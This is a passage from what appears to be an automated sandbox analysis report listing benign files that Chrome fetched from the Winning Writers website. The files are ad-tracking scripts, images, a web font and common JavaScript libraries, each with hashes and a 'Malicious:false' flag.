                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":19,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":8},{"function":"__ogt_1p_data_v2","priority":19,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vt
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 150 x 22, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4242
                                                                                                                                                                                            Entropy (8bit):7.831133258501859
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:8l2IJMI6CgDA0TY57Sn+03/zXpBZOEX1B:8NMI67TmGnpbLD
                                                                                                                                                                                            MD5:F4D39774861332CDAA6921C63F809F81
                                                                                                                                                                                            SHA1:9ACADAA84BBCA9A6BD4C11D0A43591D65B95045C
                                                                                                                                                                                            SHA-256:D83B077051F3FF4FA907BCD63D657667E28E677E6ABB008F17633C66EC7D85E1
                                                                                                                                                                                            SHA-512:587FCF4B90FDD2ABC5F2B7EBC26846089B365B687E20A52F5534758426EB045985AEDB2C3AF566D2AD70463C6E693CE4129A7DCC46DFB488FD7C679072BC1D1A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.............".e:....tEXtSoftware.Adobe ImageReadyq.e<...#iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 21.2 (Windows)" xmpMM:InstanceID="xmp.iid:1657FAF9B44611EAA981E67EF18D8615" xmpMM:DocumentID="xmp.did:1657FAFAB44611EAA981E67EF18D8615"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1657FAF7B44611EAA981E67EF18D8615" stRef:documentID="xmp.did:1657FAF8B44611EAA981E67EF18D8615"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>L..e....IDATx..[{pT..?..G..D#./..R...1."......-0N...q...mG.?..T...?.QyVASE.%..&.H....%A!....!.._....pssw.w...o..n.
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960013577&cv=11&fst=1731960013577&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=176, yresolution=184, resolutionunit=2], baseline, precision 8, 970x250, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):149028
                                                                                                                                                                                            Entropy (8bit):7.9597557722494585
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3072:quIeSCrVIE+2OK02rI4AOPnuKPH96gsrjcad4pZ3zABDnJe8GTQuaEFBJ:quIzCZI+Q+uQ96brAad4piBrJe8GTQ2J
                                                                                                                                                                                            MD5:CFFC0CCBB836EE0E07077C0B39809617
                                                                                                                                                                                            SHA1:0438CFD0F06ABA8945BCF2963A4198568EAD9BEF
                                                                                                                                                                                            SHA-256:8C690B568C6AA7112B6107A1690F4C521337AF9F25AB3F3E639CBB941F9E39CC
                                                                                                                                                                                            SHA-512:59C9FDE6D4EED4E3B05EB14646F03428C119FD3029B00D6921BE7767AB980D5BBB869B2C76D70B2192CA860132DAE4A5E28DB26902235A393A9872E6F65743C8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/wergle/wergle_2024_top_banner_970_250.jpg
                                                                                                                                                                                            Preview:......JFIF..............Exif..II*...........................................(.......................i.......V.................0231....................0100........................................;...........`.......`.......ASCII...xr:d:DAFyqFYetss:7,j:4019870225152668762,t:23102919.....http://ns.adobe.com/xap/1.0/.<x:xmpmeta xmlns:x='adobe:ns:meta/'>. <rdf:RDF xmlns:rdf='http://www.w3.org/1999/02/22-rdf-syntax-ns#'>.. <rdf:Description rdf:about=''. xmlns:dc='http://purl.org/dc/elements/1.1/'>. <dc:title>. <rdf:Alt>. <rdf:li xml:lang='x-default'>Wergle Flomp 2024 Top Banner with Art 3 (970 x 250 px) - 1</rdf:li>. </rdf:Alt>. </dc:title>. </rdf:Description>.. <rdf:Description rdf:about=''. xmlns:Attrib='http://ns.attribution.com/ads/1.0/'>. <Attrib:Ads>. <rdf:Seq>. <rdf:li rdf:parseType='Resource'>. <Attrib:Created>2023-10-29</Attrib:Created>. <Attrib:ExtId>57568078-949c-4751-bb
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13682
                                                                                                                                                                                            Entropy (8bit):4.369460928312164
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:192:3Q2hoqqat8+qrOLyBiFqopyUCByPzCbrdYDtsBinyaupWyZcl6tW5u1q8MqhX0D/:3QdwijoyxpJcwA5u7vqB
                                                                                                                                                                                            MD5:460FA23C832EF1DE3BCA01208467045E
                                                                                                                                                                                            SHA1:1DC79614723E046EAE7E8FF08E29D814AB6DDE93
                                                                                                                                                                                            SHA-256:21301AED232D9311346E0A3B14534CEDFB136743BB6D4BD86A294F35DFCAC69F
                                                                                                                                                                                            SHA-512:568BD1E19D1C7884FF701FF9D1BCFCF59935C11F724743D95FB4B6346BED219915AAD5660B35A2DF7BFC5FD8EBCC91FEE1D9E7CCF9D90F2BFFAC02CBDBC4EA48
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/responsive-nav-scripts.js
                                                                                                                                                                                            Preview:/*! responsive-nav.js 1.0.23. * https://github.com/viljamis/responsive-nav.js. * http://responsive-nav.com. *. * Copyright (c) 2013 @viljamis. * Available under the MIT license. */..(function () {.. "use strict";.. /* exported responsiveNav */. var responsiveNav = function (el, options) {. . var computed = !!window.getComputedStyle;. . // getComputedStyle polyfill. if (!computed) {. window.getComputedStyle = function(el) {. this.el = el;. this.getPropertyValue = function(prop) {. var re = /(\-([a-z]){1})/g;. if (prop === "float") {. prop = "styleFloat";. }. if (re.test(prop)) {. prop = prop.replace(re, function () {. return arguments[2].toUpperCase();. });. }. return el.currentStyle[prop] ? el.currentStyle[prop] : null;. };. return this;. };. }. /* exported addEvent, removeEvent, getChildren, setAttributes, addClass, removeClass
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4885), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4885
                                                                                                                                                                                            Entropy (8bit):5.818908459633528
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUneRtytU74:1DY0h8Rx47OIqWbZ2eRtyZ
                                                                                                                                                                                            MD5:BF0CFF74DF57173509631823F94AAA1A
                                                                                                                                                                                            SHA1:40F531DF2C0224522F711C8DB80F7CE3AFF05E04
                                                                                                                                                                                            SHA-256:5C262F483CBE7F5664D40974A6CC4B87E44A76207B62A3CEE0B5D805691B0BA4
                                                                                                                                                                                            SHA-512:0B7D0D1119CF17C9BF9BB8904F82B324825BF313109FB74B132C53E41C403D90FD2E587C1E20727C750708F3B4975F4C3065376D48EC7B267B138C4CDF78AE02
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:Web Open Font Format (Version 2), TrueType, length 48336, version 1.0
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):48336
                                                                                                                                                                                            Entropy (8bit):7.995815173088384
                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                            SSDEEP:768:aHPbHlNlYMCZibwJi/6WwetfISUeR/nQipVg2Ddz9fZIMiktaFm5x4KSz0h1wO:0DyMYibQi1fI7exQvW9RIMTim56KSz0z
                                                                                                                                                                                            MD5:BFE7AD4AA54CFF8909B2D7632073CC30
                                                                                                                                                                                            SHA1:7C2E625BEA4D449CA78CDE09AB59DC6C9CB4726F
                                                                                                                                                                                            SHA-256:47D477915FA5912616E2DC5DF8C5780F9202671678CF275472BD39F3381C0098
                                                                                                                                                                                            SHA-512:B083C9E0766F281A39F582404F08B3D3314C7757AC151C4CB00BD3CECEB4FA06B12D08D881A2C6BF80A066ECAD22FECE7CFF41269D2DBD2BFE38D873922A31FF
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://fonts.gstatic.com/s/raleway/v34/1Ptug8zYS_SKggPNyC0ITw.woff2
                                                                                                                                                                                            Preview:wOF2...................S..........................g...l..P?HVAR...`?STAT.8'2..4....../~.....$..U..,.0..<.6.$..T. ..J.. ...[3mq..c..5.Hu..ev.5.c.L6e....<.>U..#0l..h.........F.m........."...,V...\.i....;zG-....%..Nt.j....l..m.p.`=....%...}^B).I.Q..qt.l..l...i.......9~....P.".tj.._?.P.j...B.r...'...Zh...}......M].+......k].!..E<.{.........."........m...$C.."_i.>.i@.=.#......s...........%...;."...U.....n,...DO.W.n..85.._.Bj9..nN.T.xl.U".Xq^...y.......<.2'.... .`...WCT.W........?{wI.!.B..C..B.$..Zh..0/ b.....P.(X..?..._Pi.4;`y....gi.j.Zu=.8......>...*{U..K..X.P.hN......=.....C..,............f.eE.l...e.Y...K.Xf.u.%f...k...+"V.Y"W.bD.*........~.[.~QL.z2.......V.Bd..j.D...]...X.5d........){....G~Q.x....{.{.=\.5.h...DB...H]V'.....<...sD....=D(.......^.&M.2....M(iH.8<........p\d.Wo.....@..A....U..M..K...z".%....n...k.T/a..d(..5s1..P..K..i.]l..+.......ZK7H\D.N...].kL.......^.^...K)(r.J.W..L2Y...?..`.......&.%....{?T.:P9.\%..E*....H....`....r....Q.....Rw....T..}....M
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (645)
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):23136
                                                                                                                                                                                            Entropy (8bit):5.37000277635621
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:5N7WhsyZ3mw3DJeKZurcVCxHrXhYF/hxQ7SLp2EWJYZ/uS5:5N6xZ3mwI4urcVCxHrXhY9hOaQa/uS5
                                                                                                                                                                                            MD5:5C5CFD8F33E8FE13674392EEF6AD7A42
                                                                                                                                                                                            SHA1:1A3C31A361CCB7F7C1B0901ED82E669ABDE03D5F
                                                                                                                                                                                            SHA-256:0B53274F7044C36C735BDA1827C82D314379275C75D82F487466226F3AAA857B
                                                                                                                                                                                            SHA-512:1B9ADE38CC8F9BD0222E1FC58476BCFBAAA221D7534932C4BA160F532893D9260E0DB908C7B9269BE89FC07D158CAA814FB0DFC731C582F97C133AF55D0C7D82
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:/*! fancyBox v2.1.5 fancyapps.com | fancyapps.com/fancybox/#license */.(function(r,G,f,v){var J=f("html"),n=f(r),p=f(G),b=f.fancybox=function(){b.open.apply(this,arguments)},I=navigator.userAgent.match(/msie/i),B=null,s=G.createTouch!==v,t=function(a){return a&&a.hasOwnProperty&&a instanceof f},q=function(a){return a&&"string"===f.type(a)},E=function(a){return q(a)&&0<a.indexOf("%")},l=function(a,d){var e=parseInt(a,10)||0;d&&E(a)&&(e*=b.getViewport()[d]/100);return Math.ceil(e)},w=function(a,b){return l(a,b)+"px"};f.extend(b,{version:"2.1.5",defaults:{padding:15,margin:20,.width:800,height:600,minWidth:100,minHeight:100,maxWidth:9999,maxHeight:9999,pixelRatio:1,autoSize:!0,autoHeight:!1,autoWidth:!1,autoResize:!0,autoCenter:!s,fitToView:!0,aspectRatio:!1,topRatio:0.5,leftRatio:0.5,scrolling:"auto",wrapCSS:"",arrows:!0,closeBtn:!0,closeClick:!1,nextClick:!1,mouseWheel:!0,autoPlay:!1,playSpeed:3E3,preload:3,modal:!1,loop:!0,ajax:{dataType:"html",headers:{"X-fancyBox":!0}},iframe:{scroll
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):3175
                                                                                                                                                                                            Entropy (8bit):4.892567251072206
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:s06BApbDSL4+9KIb6TBaFJe/mSer80mADWEiumKZaIfWoGTfpgBfW0VMimdonoht:QmcIIbywF4JynpzUfTmcjJ
                                                                                                                                                                                            MD5:E42228BF86554E2FA08C4712F97F7E34
                                                                                                                                                                                            SHA1:6CFEE8F581C086D53C9B40FE651324AE8DEC88D4
                                                                                                                                                                                            SHA-256:8468FD27249AE1FE5F63AE32EBB17810F0502BFAC5C0090208EF0650BF8FC696
                                                                                                                                                                                            SHA-512:642B6DCEDE23DA64A4B3072864CDBC54421ADC97976FDA643439D3CED5CB39334325E94653B787965C1DBE703CEFAF68531D28140831ACB070ADB609C8C74F6A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function($){../* hoverIntent by Brian Cherne */..$.fn.hoverIntent = function(f,g) {...// default configuration options...var cfg = {....sensitivity: 7,....interval: 100,....timeout: 0...};...// override configuration options with user supplied object...cfg = $.extend(cfg, g ? { over: f, out: g } : f );....// instantiate variables...// cX, cY = current X and Y position of mouse, updated by mousemove event...// pX, pY = previous X and Y position of mouse, set by mouseover and polling interval...var cX, cY, pX, pY;....// A private function for getting mouse position...var track = function(ev) {....cX = ev.pageX;....cY = ev.pageY;...};....// A private function for comparing current and previous mouse position...var compare = function(ev,ob) {....ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t);....// compare mouse positions to see if they've crossed the threshold....if ( ( Math.abs(pX-cX) + Math.abs(pY-cY) ) < cfg.sensitivity ) {.....$(ob).unbind("mousemove",track);.....// set hoverInten
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4941), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4941
                                                                                                                                                                                            Entropy (8bit):5.811083504217623
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU2eJZetU76:1DY0h8Rx47OIqWbZbeJZe/
                                                                                                                                                                                            MD5:F9D070E605D6D23B21DA2ACD17BDD9A2
                                                                                                                                                                                            SHA1:59EB3D11A4AB072C2C478D396BA9F694162C1787
                                                                                                                                                                                            SHA-256:74FD4757A41D7149383B6878E6BDB8CEAC8A93D9329B06B2DCC7118592C793F1
                                                                                                                                                                                            SHA-512:50006F1CC33E6D006934FF8BBB797B75E80C25A1108A148CDF50D30E170214264C4A425BD90A02400AE188899163C4D966AEC682E694CB730B5D8037CFB852D9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960094422&cv=11&fst=1731960094422&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Subscribe%20to%20our%20free%20newsletter%20and%20access%20The%20Best%20Free%20Literary%20Contests&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4884), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4884
                                                                                                                                                                                            Entropy (8bit):5.819100496981329
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUqextytU7Oe:1DY0h8Rx47OIqWbZTexty+
                                                                                                                                                                                            MD5:3E41DD172BF63BECAE44A81496E1992A
                                                                                                                                                                                            SHA1:05BEC0091B5E90E71127D07964C459532B82851B
                                                                                                                                                                                            SHA-256:D4F1F2BE42E45680A79F4ED91844F2CECCFBCEB0507603FF0F06C7D063DC0695
                                                                                                                                                                                            SHA-512:0F5141FE560F74355CBED66432810126492C738E6248C6E95B9E1C09A249681523047A0349116362A63DB5E574D6D1DD2610BB4C0AE46F35DFB0B3E5EC44F6F8
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960013577&cv=11&fst=1731960013577&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Wergle%20Flomp%20Humor%20Poetry%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4780), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4780
                                                                                                                                                                                            Entropy (8bit):5.815628089948151
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUPeHGtn:1DY0h8Rx47OIqWbZGeHGl
                                                                                                                                                                                            MD5:61F1B062AD87A4DC6AC60A5BE128D130
                                                                                                                                                                                            SHA1:9FEDE57B631110054001472055A4528799A56D57
                                                                                                                                                                                            SHA-256:B060FCED276352216468FF599D25ADFC6A883297F3ADE1960C590C8C4D1B6FD7
                                                                                                                                                                                            SHA-512:065A575D21AD4701CCD5CF7AD41C7B31DEB09E94DE4610C3063BC0D1D7361A7295BF32CB5C139E29AA06050C16E8AD198381A1794964C19A304C5F99A445F13E
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:PNG image data, 1774 x 1578, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):32572
                                                                                                                                                                                            Entropy (8bit):6.886545089263578
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:vxZ2t+/9BK7J3V6oueOMKBHcmNVIhp1El:Wt+lsgo0MKXNbl
                                                                                                                                                                                            MD5:84952888BB237E40F8FCB290247323B7
                                                                                                                                                                                            SHA1:02D57D975EED8A05823096F22FA0040519937D41
                                                                                                                                                                                            SHA-256:390B5EF685FCABA863E4C2411F492E4B0E771AA07A6B72D3A66565DB793EB1A0
                                                                                                                                                                                            SHA-512:920DAE183C4BF73B0A7B4264CEA25811C21C2C6114C59F7280F880F82C3D4B9AB8DDAC4093B5E95665039EB3F5F3C6E00168185615404A55FE8402FEC0643CE6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:.PNG........IHDR.......*.....?......IDATx.....%W}...E...d......".....3.h.{..!,.......0x..%......EX..`r.I...6.a..H....G.. .......!.&tx.......F..n.z.~.&&$I.$I.$I.$I..Ak.u.t..o..4w.....4..)uU<1{vW..g....6....O..O....../u!.S...s........+.8[.........:}...7.??..?U.<...].|}h^...U..........g..G......{....nv......K.$I.S..u<....>.....e.~.>~q?...._......._../..o.{......U.;.b/.C.....-.s.}O...._..*.!........r.....Q.~..W...r..O.{.r.U...$I.4&m.:.z[g6..g..M.|.........]....'w..~.u./..fvT\......7.............Sn...<..M..~....6.$I.~..b.n./.}...9...Wy_......6..?,.Cjw....>d...|_......|......[..+.se.yN5{[.>I.$I............M.r3...um.?.o.N..[.....w.\Xn......k..|......m......7.f....t.J.$i.[......!e...p.V..y?..|.....]..aEl.../....?X..._.S........r..$I..%...x..oy...'........~.......!}....79.*....^...8.%I...}i..U.1.W..}.Gw=.c.=.Pj..#...r_.......x.y3....^.$I.r..X.t..|h.......(.......?mH...J.m....]...xTy..B..;k$I....!...l.....G/~.s.w..F..........].S..|L..
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4909
                                                                                                                                                                                            Entropy (8bit):5.8221343992152175
                                                                                                                                                                                            Encrypted:false
